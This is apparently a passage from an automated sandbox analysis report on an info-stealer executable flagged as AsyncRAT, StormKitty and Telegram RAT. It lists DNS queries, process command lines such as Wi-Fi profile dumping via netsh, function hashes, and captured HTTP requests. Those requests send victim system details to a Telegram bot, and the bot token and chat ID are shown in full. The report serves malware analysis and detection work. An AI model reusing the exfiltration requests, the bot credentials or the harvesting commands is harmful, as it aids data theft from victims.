Aug 4, 2024 14:57:41.095520973 CEST	192.168.2.6	1.1.1.1	0xb2dd	Standard query (0)	api.mylnikov.org	A (IP address)	IN (0x0001)	false
Aug 4, 2024 14:57:43.643757105 CEST	192.168.2.6	1.1.1.1	0x72cd	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Aug 4, 2024 14:57:40.482718945 CEST	1.1.1.1	192.168.2.6	0x38ba	Name error (3)	55.235.10.0.in-addr.arpa	none	none	PTR (Pointer record)	IN (0x0001)	false
Aug 4, 2024 14:57:40.554239988 CEST	1.1.1.1	192.168.2.6	0x44b8	No error (0)	icanhazip.com		104.16.185.241	A (IP address)	IN (0x0001)	false
Aug 4, 2024 14:57:40.554239988 CEST	1.1.1.1	192.168.2.6	0x44b8	No error (0)	icanhazip.com		104.16.184.241	A (IP address)	IN (0x0001)	false
Aug 4, 2024 14:57:41.241413116 CEST	1.1.1.1	192.168.2.6	0xb2dd	No error (0)	api.mylnikov.org		172.67.196.114	A (IP address)	IN (0x0001)	false
Aug 4, 2024 14:57:41.241413116 CEST	1.1.1.1	192.168.2.6	0xb2dd	No error (0)	api.mylnikov.org		104.21.44.66	A (IP address)	IN (0x0001)	false
Aug 4, 2024 14:57:43.651343107 CEST	1.1.1.1	192.168.2.6	0x72cd	No error (0)	api.telegram.org		149.154.167.220	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

api.mylnikov.org

api.telegram.org

icanhazip.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49717	104.16.185.241	80	1540	C:\Users\user\Desktop\eEo6DAcnnx.exe

Timestamp	Bytes transferred	Direction	Data
Aug 4, 2024 14:57:40.565438986 CEST	63	OUT	GET / HTTP/1.1 Host: icanhazip.com Connection: Keep-Alive
Aug 4, 2024 14:57:41.031182051 CEST	534	IN	HTTP/1.1 200 OK Date: Sun, 04 Aug 2024 12:57:40 GMT Content-Type: text/plain Content-Length: 12 Connection: keep-alive Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET Set-Cookie: __cf_bm=qhXDWi0kEwnEuaqXmub9cjdHsaW9GER4BSZkwh57JME-1722776260-1.0.1.1-kyCkwMwqkU40dnur8lzyl6uyb.2x09vTdi2kr18NUShJtLm562zIaUZ_TabS2Qs6z1axAXGnh0bk9dUdaTidyQ; path=/; expires=Sun, 04-Aug-24 13:27:40 GMT; domain=.icanhazip.com; HttpOnly Server: cloudflare CF-RAY: 8adeb6ef1d8fc42a-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33 0a Data Ascii: 8.46.123.33

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49718	172.67.196.114	443	1540	C:\Users\user\Desktop\eEo6DAcnnx.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-04 12:57:41 UTC	112	OUT	GET /geolocation/wifi?v=1.1&bssid=00:50:56:a7:21:15 HTTP/1.1 Host: api.mylnikov.org Connection: Keep-Alive
2024-08-04 12:57:43 UTC	697	IN	HTTP/1.1 404 Not Found Date: Sun, 04 Aug 2024 12:57:43 GMT Content-Type: text/html; charset=iso-8859-1 Transfer-Encoding: chunked Connection: close Cache-Control: max-age=2678400 CF-Cache-Status: MISS Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zVqKMpksYtBbNLnOKL%2FRZrhZzNbju6VuEwKwugFrcsvtLptkwWXMvWLJUCeUK6uCLoYzfttzQLsH9P%2B0XtR7RFcSXBXlAHYHSSkbzogpQbgwx%2FKMRi1268Dpmu%2BXP9%2F0QUqp"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Strict-Transport-Security: max-age=0; preload X-Content-Type-Options: nosniff Server: cloudflare CF-RAY: 8adeb6faced90c7a-EWR alt-svc: h3=":443"; ma=86400
2024-08-04 12:57:43 UTC	316	IN	Data Raw: 31 33 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0d 0a 3c 54 49 54 4c 45 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0d 0a 3c 48 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 48 31 3e 0d 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 67 65 6f 6c 6f 63 61 74 69 6f 6e 2f 77 69 66 69 3f 76 3d 31 2e 31 26 62 73 73 69 64 3d 30 30 3a 35 30 3a 35 36 3a 61 37 3a 32 31 3a 31 35 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 50 3e 0d 0a 3c 48 52 3e 0d 0a 3c 41 44 44 52 45 53 53 3e 48 54 54 50 Data Ascii: 135<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>The requested URL /geolocation/wifi?v=1.1&bssid=00:50:56:a7:21:15 was not found on this server.<P><HR><ADDRESS>HTTP
2024-08-04 12:57:43 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.6	49720	149.154.167.220	443	1540	C:\Users\user\Desktop\eEo6DAcnnx.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-04 12:57:44 UTC	1675	OUT	GET /bot6082381502:AAGYF_HaZVw7ziBPxYHyd8WNo0uQbAM7fiU/sendMessage?chat_id=5795480469&text=%0A%20%20%F0%9F%8C%AA%20WorldWind%20Pro%20-%20Results:%0ADate:%202024-08-04%208:57:31%20am%0ASystem:%20Windows%2010%20Pro%20(64%20Bit)%0AUsername:%20user%0ACompName:%20715575%0ALanguage:%20%F0%9F%87%A8%F0%9F%87%AD%20en-CH%0AAntivirus:%20Windows%20Defender.%0A%0A%20%20%F0%9F%92%BB%20Hardware:%0ACPU:%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz%0AGPU:%20U2FFA%0ARAM:%204095MB%0AHWID:%208E348CD443%0APower:%20NoSystemBattery%20(1%25)%0AScreen:%201280x1024%0A%0A%20%20%F0%9F%93%A1%20Network:%20%0AGateway%20IP:%20192.168.2.1%0AInternal%20IP:%20No%20network%20adapters%20with%20an%20IPv4%20address%20in%20the%20system!%0AExternal%20IP:%208.46.123.33%0ABSSID:%2000:50:56:a7:21:15%0A%0A%20%20%F0%9F%92%B8%20Domains%20info:%0A%20%20%20%E2%88%9F%20%F0%9F%8F%A6%20Bank%20Logs%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%92%B0%20Crypto%20Logs%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%8D%93%20Freaky%20Logs%20(No%2 [TRUNCATED] Host: api.telegram.org Connection: Keep-Alive
2024-08-04 12:57:44 UTC	346	IN	HTTP/1.1 400 Bad Request Server: nginx/1.18.0 Date: Sun, 04 Aug 2024 12:57:44 GMT Content-Type: application/json Content-Length: 56 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-08-04 12:57:44 UTC	56	IN	Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 30 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4c 6f 67 67 65 64 20 6f 75 74 22 7d Data Ascii: {"ok":false,"error_code":400,"description":"Logged out"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.6	49721	149.154.167.220	443	1540	C:\Users\user\Desktop\eEo6DAcnnx.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-04 12:57:45 UTC	171	OUT	GET /bot6082381502:AAGYF_HaZVw7ziBPxYHyd8WNo0uQbAM7fiU/sendMessage?chat_id=5795480469&text=%F0%9F%93%81%20Uploading%20Log%20Folders... HTTP/1.1 Host: api.telegram.org
2024-08-04 12:57:45 UTC	346	IN	HTTP/1.1 400 Bad Request Server: nginx/1.18.0 Date: Sun, 04 Aug 2024 12:57:45 GMT Content-Type: application/json Content-Length: 56 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-08-04 12:57:45 UTC	56	IN	Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 30 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4c 6f 67 67 65 64 20 6f 75 74 22 7d Data Ascii: {"ok":false,"error_code":400,"description":"Logged out"}

Target ID:	0
Start time:	08:57:27
Start date:	04/08/2024
Path:	C:\Users\user\Desktop\eEo6DAcnnx.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\eEo6DAcnnx.exe"
Imagebase:	0x900000
File size:	179'200 bytes
MD5 hash:	720B2D599314EAF90CD60038F7E7D2E8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000000.00000000.2306109761.0000000000902000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_StormKitty, Description: Yara detected StormKitty Stealer, Source: 00000000.00000000.2306109761.0000000000902000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000000.2306109761.0000000000902000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000000.2306109761.0000000000902000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: 00000000.00000000.2306109761.0000000000902000.00000002.00000001.01000000.00000003.sdmp, Author: ditekSHen Rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex, Description: Detects executables referencing Discord tokens regular expressions, Source: 00000000.00000000.2306109761.0000000000902000.00000002.00000001.01000000.00000003.sdmp, Author: ditekSHen Rule: JoeSecurity_StormKitty, Description: Yara detected StormKitty Stealer, Source: 00000000.00000002.4766888290.0000000002C61000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.4766888290.0000000002C61000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex, Description: Detects executables referencing Discord tokens regular expressions, Source: 00000000.00000002.4766888290.0000000002C61000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	2
Start time:	08:57:38
Start date:	04/08/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"cmd.exe" /C chcp 65001 && netsh wlan show profile \| findstr All
Imagebase:	0x1c0000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	08:57:38
Start date:	04/08/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	08:57:38
Start date:	04/08/2024
Path:	C:\Windows\SysWOW64\chcp.com
Wow64 process (32bit):	true
Commandline:	chcp 65001
Imagebase:	0xa40000
File size:	12'800 bytes
MD5 hash:	20A59FB950D8A191F7D35C4CA7DA9CAF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	08:57:39
Start date:	04/08/2024
Path:	C:\Windows\SysWOW64\netsh.exe
Wow64 process (32bit):	true
Commandline:	netsh wlan show profile
Imagebase:	0xa60000
File size:	82'432 bytes
MD5 hash:	4E89A1A088BE715D6C946E55AB07C7DF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	08:57:39
Start date:	04/08/2024
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr All
Imagebase:	0x690000
File size:	29'696 bytes
MD5 hash:	F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	08:57:39
Start date:	04/08/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid
Imagebase:	0x1c0000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	08:57:39
Start date:	04/08/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	08:57:39
Start date:	04/08/2024
Path:	C:\Windows\SysWOW64\chcp.com
Wow64 process (32bit):	true
Commandline:	chcp 65001
Imagebase:	0xa40000
File size:	12'800 bytes
MD5 hash:	20A59FB950D8A191F7D35C4CA7DA9CAF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	08:57:39
Start date:	04/08/2024
Path:	C:\Windows\SysWOW64\netsh.exe
Wow64 process (32bit):	true
Commandline:	netsh wlan show networks mode=bssid
Imagebase:	0xa60000
File size:	82'432 bytes
MD5 hash:	4E89A1A088BE715D6C946E55AB07C7DF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	14.4%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	3.4%
Total number of Nodes:	87
Total number of Limit Nodes:	0

Executed Functions

Function 05290B20 Relevance: 1.6, APIs: 1, Instructions: 65
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 05290B6C

Memory Dump Source

Source File: 00000000.00000002.4770231515.0000000005290000.00000040.00000800.00020000.00000000.sdmp, Offset: 05290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5290000_eEo6DAcnnx.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 9855ba7cde151f5ec68299a570be6da14049c6000aa3698d9088ba4a6d6cab17
Instruction ID: 18462d8cc1cb373cd4d9fbe93585d0408efa7618c419ce2a0af0cac35dc266a9
Opcode Fuzzy Hash: 9855ba7cde151f5ec68299a570be6da14049c6000aa3698d9088ba4a6d6cab17
Instruction Fuzzy Hash: 14216A307112198FCB58EB69C9687AE77F2AF88345F204479D006E7399DF799C42DB80

Function 00F65AC0 Relevance: 1.5, Strings: 1, Instructions: 281
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

\V,m, xrefs: 00F65D77

Memory Dump Source

Source File: 00000000.00000002.4766348217.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_eEo6DAcnnx.jbxd

Similarity

API ID:
String ID: \V,m
API String ID: 0-3265022799
Opcode ID: 8a052e497fd4a92e60c393500ec7c4bb91c13004dc1e2829a0777b73760d35a8
Instruction ID: b22297982ca3c8d9abad46c7738213faff86f8c1cc88b2079049259a400a15f6
Opcode Fuzzy Hash: 8a052e497fd4a92e60c393500ec7c4bb91c13004dc1e2829a0777b73760d35a8
Instruction Fuzzy Hash: 2DB14D70E006098FDF14CFA9D8857AEBBF2BF88B14F148129D415BB294EB749845DF81

Function 00F66390 Relevance: .3, Instructions: 266COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4766348217.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_eEo6DAcnnx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a62a5f317008d4af347658d4553c331d3d80138bdc33602f0424690b05b4ebc2
Instruction ID: fc74a29d235c23b0dd759d46b9ff0954953a9d5e34cf2e30822fc5d90a6c511d
Opcode Fuzzy Hash: a62a5f317008d4af347658d4553c331d3d80138bdc33602f0424690b05b4ebc2
Instruction Fuzzy Hash: BDB14E70E00209CFDF10CFA9D9957ADBBF2AF88724F248129D815EB294EB759845DF81

Function 00F660FC Relevance: 2.7, Strings: 2, Instructions: 180
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

\V,m, xrefs: 00F66177
\V,m, xrefs: 00F662CA

Memory Dump Source

Source File: 00000000.00000002.4766348217.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_eEo6DAcnnx.jbxd

Similarity

API ID:
String ID: \V,m$\V,m
API String ID: 0-2328366710
Opcode ID: 7652b7a9806798cbfb8c244a8f9b0f59367808a48b3fcfe4a9790b2945f72c54
Instruction ID: f57d0d0387ea94b72dc828c9296991d43fcc07acec2e8e2095ad5ec6bf196a14
Opcode Fuzzy Hash: 7652b7a9806798cbfb8c244a8f9b0f59367808a48b3fcfe4a9790b2945f72c54
Instruction Fuzzy Hash: F9714770E002499FDF10DFA9D891BEEBBF2AF88714F148129E415EB354EB749842DB91

Function 00F66108 Relevance: 2.7, Strings: 2, Instructions: 180
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

\V,m, xrefs: 00F66177
\V,m, xrefs: 00F662CA

Memory Dump Source

Source File: 00000000.00000002.4766348217.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_eEo6DAcnnx.jbxd

Similarity

API ID:
String ID: \V,m$\V,m
API String ID: 0-2328366710
Opcode ID: 8ac199ceff66fdea1a79361f24915a8e888be7b03f7d20505e018c942159114c
Instruction ID: 252411113fb4d38588d2296f848a9beb838dd3c53cdefb1fcbf4eb96c9f6b203
Opcode Fuzzy Hash: 8ac199ceff66fdea1a79361f24915a8e888be7b03f7d20505e018c942159114c
Instruction Fuzzy Hash: 65714770E002098FDF14DFA9C891BAEBBF2BF88714F148129E415EB354EB749841DB81

Function 00F6CB98 Relevance: 1.8, Strings: 1, Instructions: 531
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

d, xrefs: 00F6CD78

Memory Dump Source

Source File: 00000000.00000002.4766348217.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_eEo6DAcnnx.jbxd

Similarity

API ID:
String ID: d
API String ID: 0-2564639436
Opcode ID: b980178e7096a2892d3228c11766468b9baa09ae7ad6c801b32a87ce3df52830
Instruction ID: 2ef789cf080616b8879f3a0109f92b394a5263db09c29ef190eedc44c49d249c
Opcode Fuzzy Hash: b980178e7096a2892d3228c11766468b9baa09ae7ad6c801b32a87ce3df52830
Instruction Fuzzy Hash: C5322670E00609DFCB24CF69D984BAEBBF2FF88314F248629E4559B655D730E895DB80

Function 05290B1E Relevance: 1.6, APIs: 1, Instructions: 66
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 05290B6C

Memory Dump Source

Source File: 00000000.00000002.4770231515.0000000005290000.00000040.00000800.00020000.00000000.sdmp, Offset: 05290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5290000_eEo6DAcnnx.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: f5a12358a5476aaa365f16b387286c9b6314cbf500d6b9182557ef879b073603
Instruction ID: b2f7ca24eb46667847f8b6255c072c805e43bc3220208200a7b69763d2908e0e
Opcode Fuzzy Hash: f5a12358a5476aaa365f16b387286c9b6314cbf500d6b9182557ef879b073603
Instruction Fuzzy Hash: 8A2158307152198FCB58EB64C9687AE36F2AB88345F204479D006E7395DF758C02CB80

Function 05295311 Relevance: 1.6, APIs: 1, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

KiUserCallbackDispatcher.NTDLL(00000050), ref: 052953A3

Memory Dump Source

Source File: 00000000.00000002.4770231515.0000000005290000.00000040.00000800.00020000.00000000.sdmp, Offset: 05290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5290000_eEo6DAcnnx.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: a573c83ac33f9e0670d46707cd19ad94441bedc7ee1d04e4465ded083b70f216
Instruction ID: fb83a6ab70b54955366c58a2a93d2039dd0b85eebbd6592c9a8bbe06e83857dd
Opcode Fuzzy Hash: a573c83ac33f9e0670d46707cd19ad94441bedc7ee1d04e4465ded083b70f216
Instruction Fuzzy Hash: 6E2177B190434ACFCB19CFA9D8446EEBBB4FF08310F24844AD955A7381D7786945CFA5

Function 05295320 Relevance: 1.6, APIs: 1, Instructions: 56
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

KiUserCallbackDispatcher.NTDLL(00000050), ref: 052953A3

Memory Dump Source

Source File: 00000000.00000002.4770231515.0000000005290000.00000040.00000800.00020000.00000000.sdmp, Offset: 05290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5290000_eEo6DAcnnx.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: 6bfca221d3e53ae9c06d6f3e20dc30b5c39c920234405bc02f8e28aa4fa6d06f
Instruction ID: d43c0930b08a30413cdfb83c03d8b53851aead7e13287c46fe1d8071b4ed8fa2
Opcode Fuzzy Hash: 6bfca221d3e53ae9c06d6f3e20dc30b5c39c920234405bc02f8e28aa4fa6d06f
Instruction Fuzzy Hash: 072137B190425ACFCB14DF99E8446EEBBB4BF08310F10841AD519B7380C7786945CFA5

Function 00F65AB4 Relevance: 1.5, Strings: 1, Instructions: 278
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

\V,m, xrefs: 00F65D77

Memory Dump Source

Source File: 00000000.00000002.4766348217.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_eEo6DAcnnx.jbxd

Similarity

API ID:
String ID: \V,m
API String ID: 0-3265022799
Opcode ID: d98e065b0b3bd0214a34d3a52a2a1d12418af9b3a6fbc04bf2ab925f0c162822
Instruction ID: 2b213f1678340d3735bb3d28da328dfde8ea2f3bc8e09883fdb6a1d1afc0c9ce
Opcode Fuzzy Hash: d98e065b0b3bd0214a34d3a52a2a1d12418af9b3a6fbc04bf2ab925f0c162822
Instruction Fuzzy Hash: 07B14B70E006098FDB10CFA9D8857EEBBF1AF88B14F248129D855BB294EB749845DF81

Function 05290A6A Relevance: 1.5, APIs: 1, Instructions: 23
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

KiUserExceptionDispatcher.NTDLL ref: 05290A89

Memory Dump Source

Source File: 00000000.00000002.4770231515.0000000005290000.00000040.00000800.00020000.00000000.sdmp, Offset: 05290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5290000_eEo6DAcnnx.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 5b3f42f28cad81da845493bf38f0ab324d7bde88ba9fb79bf973b0fb98366bb1
Instruction ID: 60dd44e6f02b7a0b5d077acfa0edc73bb8fe73582a59de9a60539c8e7af4b7a3
Opcode Fuzzy Hash: 5b3f42f28cad81da845493bf38f0ab324d7bde88ba9fb79bf973b0fb98366bb1
Instruction Fuzzy Hash: 3AE03936921529DFCF19DB95E9586ECB372FF84311F028126C25653610C7706892DBC6

Function 05290A7C Relevance: 1.5, APIs: 1, Instructions: 19
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

KiUserExceptionDispatcher.NTDLL ref: 05290A89

Memory Dump Source

Source File: 00000000.00000002.4770231515.0000000005290000.00000040.00000800.00020000.00000000.sdmp, Offset: 05290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5290000_eEo6DAcnnx.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: dc0fb4268e8c433afde0f275380a063e589a0817da35b84e1b733de82208ca5e
Instruction ID: 196ed65f8940e3656f9adc7d7bd665d1f9f9fe28aad70ecfc06b73417ed79ca8
Opcode Fuzzy Hash: dc0fb4268e8c433afde0f275380a063e589a0817da35b84e1b733de82208ca5e
Instruction Fuzzy Hash: 97E04F3292192DDBCF08CB85E9586ECB371FF80311F01C126C55653650C7307892DBC1

Function 00F61750 Relevance: 1.4, Strings: 1, Instructions: 163
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

d t, xrefs: 00F6179D

Memory Dump Source

Source File: 00000000.00000002.4766348217.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_eEo6DAcnnx.jbxd

Similarity

API ID:
String ID: d t
API String ID: 0-2792223501
Opcode ID: f588b5eac4640f489d23b11f6fcd1c244ec879ad721fee91b353cd55d2e91e03
Instruction ID: 0c1f9e5bc0dc1ba366a9091bf1ac8c513d5ed2ae9dc84b40d9b2e099a64983c4
Opcode Fuzzy Hash: f588b5eac4640f489d23b11f6fcd1c244ec879ad721fee91b353cd55d2e91e03
Instruction Fuzzy Hash: C4516930B102048FCB54DF79C858A9EBBF2FF89710F2581A9E406EB3A5DA75DD019B91

Function 00F68651 Relevance: 1.4, Strings: 1, Instructions: 132
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

K, xrefs: 00F687A7

Memory Dump Source

Source File: 00000000.00000002.4766348217.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_eEo6DAcnnx.jbxd

Similarity

API ID:
String ID: K
API String ID: 0-2299363055
Opcode ID: 3489e81fbe1d1360de210c9be7b658d23988a93c078f869a851e5ae7c091bdf0
Instruction ID: 9fcb4ea0d751ca1b4e49fcb938e236f5e2e8ded8699154075e2a9e56da60a55b
Opcode Fuzzy Hash: 3489e81fbe1d1360de210c9be7b658d23988a93c078f869a851e5ae7c091bdf0
Instruction Fuzzy Hash: A251BD71E0064ACFCB14DFA9C4406AEBBB2BF88354B20862DD406AB351DF30ED46DB80

Function 00F61F3F Relevance: .8, Instructions: 788COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4766348217.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_eEo6DAcnnx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4b1a3652a2042733481f7b5a423964eaf5a8cc16c352e2df732d6ed1947bb95d
Instruction ID: 810734231a9e336c4071539f29b243cf103554d32b169072a7a0a5e7b26c8c82
Opcode Fuzzy Hash: 4b1a3652a2042733481f7b5a423964eaf5a8cc16c352e2df732d6ed1947bb95d
Instruction Fuzzy Hash: 8072EB34A0021C8FDB54EBA0CD647DE7B76AF89340F1080A9D24AA73A5DF355E86DF51

Function 00F61F50 Relevance: .8, Instructions: 780COMMON

Download Yara Rule

Memory Dump Source

